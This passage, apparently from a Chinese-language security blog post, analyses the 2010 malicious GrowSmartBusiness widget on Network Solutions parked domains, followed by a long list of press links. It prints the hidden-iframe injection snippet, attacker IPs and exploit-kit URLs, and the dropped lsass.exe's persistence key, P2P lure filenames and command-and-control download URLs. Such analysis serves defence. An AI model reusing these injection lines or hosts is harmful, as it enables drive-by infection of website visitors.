nt<br /><pre class="brush: js;"><br /><iframe style="" height="300px" frameborder="0" style="border:none;overflow:none;" width="180px" src="http://growsmartbusiness.com/widgets/widget.php"></iframe><br /></pre><br />5. http://growsmartbusiness.com/widgets/widget.php,<br /><pre class="brush: js;"><br />...omitted...<br /><iframe frameborder=0 src="http://96.30.16.216:8037/exemple.com/" width=1 height=1 scrolling=no></iframe><br /></pre><br />6. http://96.30.16.216:8037/exemple.com/, malicious code<br />7. http://96.30.16.216:8037/exemple.com/error.js.php, malicious code<br />8. http://208.86.153.68:8067/exemple.com/load.php?spl=mdac, malicious code<br />9. http://96.30.16.216:8037/exemple.com/?spl=2&br=MSIE&vers=6.0&s=, malicious code<br />10. http://96.30.16.216:8037/exemple.com/error.js.php, malicious code<br />11. http://96.30.16.216:8037/exemple.com/992.jar<br />12. http://96.30.16.216:8037/exemple.com/cbe.jar<br /><br />B. 掛馬後台<br /><br />掛馬後台用的工具是 <a href="http://krebsonsecurity.com/2010/01/a-peek-inside-the-eleonore-browser-exploit-kit/">Eleonore 掛馬包</a>,version 1.3.1:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_hELDi5B8zOI/TGzNIFJopgI/AAAAAAAACHo/DDtQvNMeK1w/s1600/eleonore_748.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_hELDi5B8zOI/TGzNIFJopgI/AAAAAAAACHo/DDtQvNMeK1w/s1600/eleonore_748.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5507001983072511490" /></a><br />就如大部分的掛馬平台一樣,Eleonore會設法判斷來訪的瀏覽器,並餵出相對應的exploits。這個版本的Eleonore可攻擊的對象有:Adobe Reader,Java(cross-browsers),Internet Explorer,Firefox,以及Opera。以下是其所支援的 exploits:<br /><br />MDAC<br />MS009-02<br />ActiveX pack<br />CompareTo<br />JNO (JS navigator Object Code)<br />MS06-006<br />Font tags<br />Telnet<br />PDF collab.getIcon<br />PDF Util.Printf<br />PDF collab.collectEmailInfo<br />Java D&E<br />Soc pack (iframe ver)<br /><br />平均感染成功率,北美 5-17% ,俄羅斯(.ur) 10-25%。<br /><br />這次這個惡意掛馬後端平台也開啟了以下防偵測之功能:<br /><br />一: 每一個IP只供應一次<br />二: 只供應給特定的瀏覽器<br />三: 阻擋常見線上掛馬分析服務。所以如 Wepawet 與 jsunpack等,在這個案例中都無法幫上忙。可以參考此次 <a href="http://wepawet.iseclab.org/view.php?hash=4c478d7f87d8e3ea1060b149ef477b30&t=1281635447&type=js">Wepawet 的分析結果</a>及 <a href="http://jsunpack.jeek.org/dec/go?report=f6f6f81b6bf231051d5d5887be061549f7d4110a">jsunpack 的分析結果</a> 。<br /><br /><br />最後,關於它所安裝的惡意程式<b>lsass.exe</b>本身,以下是關於它的分析(credits to Chris Hsiao):<br />當執行它時,它會建立下最幾個檔案:<br />=========================================================<br />%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\install.rdf<br />%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome.manifest<br />%ProgramFiles%\Mozilla Firefox\extensions\{9ce11043-9a15-4207-a565-0c94c42d590d}\chrome\content\timer.xul<br />%USERPROFILE%\Application Data\SystemProc\lsass.exe<br /><br />在註冊表中會加入以下的機碼,讓它在下次開機時有自動啟動的能力:<br />=========================================================<br />[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]<br />"RTHDBPL" = "%appdata%\SystemProc\lsass.exe"<br /><br />它會監視以下類型的幾個瀏覽器:<br />=========================================================<br />Explorer<br />Opera<br />Chrome<br />Firefox<br /><br />使用者若用以上的搜尋引擎會被重導到其它網站:<br />=========================================================<br />Google<br />Ask<br />Yahoo!<br />AOL<br />Bing<br /><br />它會監視以下的搜尋字串,一旦找到它會根據所找到的字串跳出廣告視窗:<br />=========================================================<br />cialis<br />pharma<br />casino<br />finance<br />mortgage<br />insurance<br />gambling<br />health<br />hotel<br />travel<br />antivirus<br />antivir<br />pocker<br />poker<br />video<br />baby<br />bany<br />porn<br />golf<br />diet<br />vocations<br />design<br />graphic<br />football<br />footbal<br />estate<br />baseball<br />shop<br />books<br />gifts<br />money<br />spyware<br />credit<br />loans<br />loan<br />dating<br />ebay<br />myspace<br />virus<br />film<br />ipod<br />verizon<br />amazon<br />iphone<br />software<br />movie<br />mobile<br />bank<br />music<br />cars<br />craigslist<br />game<br />sport<br />medical<br />school<br />wallpaper<br />military<br />weather<br />twitter<br />fashion<br />spybot<br />trading<br />tramadol<br />yobt<br />flower<br />cigarettes<br />doctor<br />flights<br />airlines<br />comcast<br /><br />它會搜尋以下的目錄是否存在:<br />=========================================================<br />C:\program files\winmx\shared\<br />C:\program files\tesla\files\<br />C:\program files\limewire\shared\<br />C:\program files\morpheus\my shared folder\<br />C:\program files\emule\incoming\<br />C:\program files\edonkey2000\incoming\<br />C:\program files\bearshare\shared\<br />C:\program files\grokster\my grokster\<br />C:\program files\icq\shared folder\<br />C:\program files\kazaa lite k++\my shared folder\<br />C:\program files\kazaa lite\my shared folder\<br />C:\program files\kazaa\my shared folder\<br /><br />一旦找到以上的任何一個目錄,它會用下面的檔名拷貝自已(lsass.exe)到這些目錄中:<br />=========================================================<br />YouTubeGet 5.6.exe<br />Youtube Music Downloader 1.3.exe<br />WinRAR v3.x keygen [by HiXem].exe<br />Windows2008 keygen and activator.exe<br />[+ MrKey +] Windows XP PRO Corp SP3 valid-key generator.exe<br />Windows Password Cracker + Elar3 key.exe<br />[Eni0j0 team] Windows 7 Ultimate keygen.exe<br />Windows 2008 Enterprise Server VMWare Virtual Machine.exe<br />Winamp.Pro.v7.xx.PowerPack.Portable+installer.exe<br />Website Hacker.exe<br />[Eni0j0 team] Vmvare keygen.exe<br />VmWare 7.x keygen.exe<br />UT 2003 KeyGen.exe<br />Twitter FriendAdder 2.3.9.exe<br />Tuneup Ultilities 2010.exe<br />[antihack tool] Trojan Killer v2.9.4173.exe<br />Total Commander7 license+keygen.exe<br />Super Utilities Pro 2009 11.0.exe<br />Sub7 2.5.1 Private.exe<br />Sophos antivirus updater bypass.exe<br />sdbot with NetBIOS Spread.exe<br />[fixed]RapidShare Killer AIO 2010.exe<br />Rapidshare Auto Downloader 3.8.6.exe<br />Power ISO v4.4 + keygen milon.exe<br />[patched, serial not needed] PDF Unlocker v2.0.5.exePDF-XChange Pro.exe<br />[patched, serial not needed] PDF to Word Converter 3.4.exe<br />PDF password remover (works with all acrobat reader).exe<br />Password Cracker.exe<br />Norton Internet Security 2010 crack.exe<br />Norton Anti-Virus 2010 Enterprise Crack.exe<br />Norton Anti-Virus 2005 Enterprise Crack.exe<br />NetBIOS Hacker.exe<br />NetBIOS Cracker.exe<br />[patched, serial not need] Nero 9.x keygen.exe<br />Myspace theme collection.exe<br />MSN Password Cracker.exe<br />Mp3 Splitter and Joiner Pro v3.48.exe<br />Motorola, nokia, ericsson mobil phone tools.exe<br />Microsoft.Windows 7 ULTIMATE FINAL activator+keygen x86.exe<br />Microsoft Visual Studio KeyGen.exe<br />Microsoft Visual C++ KeyGen.exe<br />Microsoft Visual Basic KeyGen.exe<br />McAfee Total Protection 2010 [serial patch by AnalGin].exe<br />Magic Video Converter 8.exe<br />LimeWire Pro v4.18.3 [Cracked by AnalGin].exe<br />L0pht 4.0 Windows Password Cracker.exe<br />K-Lite Mega Codec v5.2 Portable.exe<br />K-Lite Mega Codec v5.2.exe<br />Keylogger unique builder.exe<br />Kaspersky Internet Security 2010 keygen.exe<br />Kaspersky AntiVirus 2010 crack.exe<br />IP Nuker.exe<br />Internet Download Manager V5.exe<br />Image Size Reducer Pro v1.0.1.exe<br />ICQ Hacker Trial version [brute].exe<br />Hotmail Hacker [Brute method].exe<br />Hotmail Cracker [Brute method].exe<br />Half-Life 2 Downloader.exe<br />Grand Theft Auto IV [Offline Activation + mouse patch].exe<br />Google SketchUp 7.1 Pro.exe<br />G-Force Platinum v3.7.6.exe<br />FTP Cracker.exe<br />DVD Tools Nero 10.x.x.x.exe<br />Download Boost 2.0.exe<br />Download Accelerator Plus v9.2.exe<br />Divx Pro 7.x version Keymaker.exe<br />DivX 5.x Pro KeyGen generator.exe<br />DCOM Exploit archive.exe<br />Daemon Tools Pro 4.8.exe<br />Counter-Strike Serial key generator [Miona patch].exe<br />CleanMyPC Registry Cleaner v6.02.exe<br />Brutus FTP Cracker.exe<br />Blaze DVD Player Pro v6.52.exe<br />BitDefender AntiVirus 2010 Keygen.exe<br />Avast 5.x Professional.exe<br />Avast 4.x Professional.exe<br />Ashampoo Snap 3.xx [Skarleot Group].exe<br />AOL Password Cracker.exe<br />AOL Instant Messenger (AIM) Hacker.exe<br />AnyDVD HD v.6.3.1.8 Beta incl crack.exe<br />Anti-Porn v13.x.x.x.exe<br />Alcohol 120 v1.9.x.exe<br />Adobe Photoshop CS4 crack by M0N5KI Hack Group.exe<br />Adobe Illustrator CS4 crack.exe<br />Adobe Acrobat Reader keygen.exe<br />Ad-aware 2010.exe<br />[patched, serial not needed] Absolute Video Converter 6.2-7.exe<br /><br />它會嘗試連至以下連結來下載指令及更多的惡意程式:<br />=========================================================<br />http://updrandomhottys.com/update.php?sd=2010-03-23&aid=blackout<br />http://updrandomhottys.com/inst.php?aid=blackout<br /><br /><b><a name="part7">附錄--相關報導</a></b><br /><br /><div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; background-color: transparent; font-family: Arial; font-weight: normal; font-size: medium; "><span id="internal-source-marker_0.7688466729596257" style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, Forbes.com, </span><a href="http://blogs.forbes.com/andygreenberg/2010/08/16/record-five-million-sites-were-likely-infected-by-hacked-web-widget/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Record Five Million Sites Were Likely Infected By Hacked Web Widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, eWeek, </span><a href="http://www.eweek.com/c/a/Security/Infected-Widget-Compromises-Parked-Domains/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Infected Widget Compromises Parked Domains</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, SC Magazine, </span><a href="http://www.scmagazineus.com/up-to-five-million-parked-domains-served-malware-widget/article/176991/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Up to five million parked domains served malware widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, PCMagazine, </span><a href="http://www.pcmag.com/article2/0,2817,2367935,00.asp"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Innocuous Network Solutions Web Widget Served Malware</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, CNet, </span><a href="http://news.cnet.com/8301-27080_3-20013751-245.html"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Parked Network Solutions domains served up malware</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, ZDNet UK, </span><a href="http://www.zdnet.co.uk/news/security-threats/2010/08/17/malicious-widget-attacks-compromise-parked-domains-40089836/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Malicious widget attacks compromise parked domains</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, InfoWorld, </span><a href="http://www.infoworld.com/t/malware/network-solutions-versus-the-wily-widget-236"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Network Solutions versus the wily widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, Dark Reading, </span><a href="http://www.darkreading.com/smb-security/security/attacks/showArticle.jhtml?articleID=226700418"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Mass Drive-By Attack Used Web Widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, The Register, </span><a href="http://www.theregister.co.uk/2010/08/17/net_sol_tainted_widget/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Network Solutions pulls widget that tainted up to 5m websites</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, ThreatPost, </span><a href="http://threatpost.com/en_us/blogs/network-solutions-malicious-widget-may-date-january-081610"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Network Solutions Malicious Widget May Date to January</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, Slashdot, </span><a href="http://news.slashdot.org/story/10/08/16/214228/5-Million-Domains-Serving-Malware-Via-Network-Solutions"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">5 Million Domains Serving Malware Via Network Solutions</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-18, TheTechHerald, </span><a href="http://www.thetechherald.com/article.php/201032/6023/500-000-parked-domains-on-Network-Solutions-serving-Malware-Update"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">500,000 parked domains on Network Solutions serving Malware</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, ComputerWorld, </span><a href="http://www.computerworld.com/s/article/9180783/Malicious_widget_hacked_millions_of_Web_sites"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Malicious widget hacked millions of Web sites</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-18, PC World, </span><a href="http://www.pcworld.com/article/203505/koobface_variant_tainted_5_million_websites.html?tk=hp_new"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Koobface Variant Tainted 5 Million Websites</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, KrebsOnSecurity, </span><a href="http://krebsonsecurity.com/2010/08/networksolutions-sites-hacked-by-wicked-widget/#more-4532"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">NetworkSolutions Sites Hacked By Wicked Widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, TheWhir, </span><a href="http://www.thewhir.com/web-hosting-news/081610_Report_Network_Solutions_Hack_hit_up_to_5_Million_Sites"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Report: Network Solutions Hack hit up to 5 Million Sites</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, Net-Security, </span><a href="http://www.net-security.org/malware_news.php?id=1431"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">5 million domains serving malware via compromised Network Solutions widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, DomainNameNews, </span><a href="http://www.domainnamenews.com/registrars/millions-network-solutions-parked-pages-serving-malware/7906"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Millions of Network Solutions Parked Pages Were Serving Malware</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, InformationWeek, </span><a href="http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=226700394&cid=RSSfeed_IWK_News"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Malware Spewing Widget Hacks 500,000 Websites</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-18, InformationWeek, </span><a href="http://www.informationweek.com/blog/main/archives/2010/08/network_solutio_1.html"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Network Solutions Small Biz Widget Woes Offers Security Lessons</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><h5><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, Secunia, </span><a href="http://secunia.com/advisories/40995/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">GrowSmartBusiness Small Business Success Index Widget Security Issue</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "> 2010-08-16, Help Net Security, </span><a href="http://www.net-security.org/malware_news.php?id=1431"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">5 million domains serving malware via compromised Network Solutions widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span></h5><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-21, SPAMFighter, </span><a href="http://www.spamfighter.com/News-14975-Millions-of-Web-Websites-Hacked-by-Malicious-Widget.htm"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Millions of Web Websites Hacked by Malicious Widget</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, InfoTECH, </span><a href="http://it.tmcnet.com/topics/it/articles/95434-network-solutions-widget-allows-malware-distribution.htm"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Network Solutions Widget Allows Malware Distribution</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, Technologizer, </span><a href="http://technologizer.com/2010/08/16/five-million-websites-carried-koobface-worm-variant/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Five Million Websites Carried Koobface Worm Variant</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, TGDaily, </span><a href="http://www.tgdaily.com/security-features/51108-millions-of-parked-websites-infected-by-malware"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Millions of parked websites infected by malware</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-17, ITBusinessEdge, </span><a href="http://www.itbusinessedge.com/cm/community/news/sec/blog/millions-of-websites-hacked-by-malicious-widget/?cs=42808"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Millions of Websites Hacked by Malicious Widget?</span></a><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, Ecom Technology, F</span><a href="http://ecomtechnology.biz/blog/2010/08/16/five-million-parked-domains-belonging-to-customers-of-network-solutions-fell-victim-to-an-infected-widget-and-were-serving-up-a-side-order-of-malware/"><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">ve million parked domains belonging to customers of Network Solutions fell victim to an infected widget and were serving up a side order of malware</span></a><span style="font-size: 11pt; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "></span><br /><span style="font-size: 10pt; font-family: Verdana; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; ">2010-08-16, Maximum 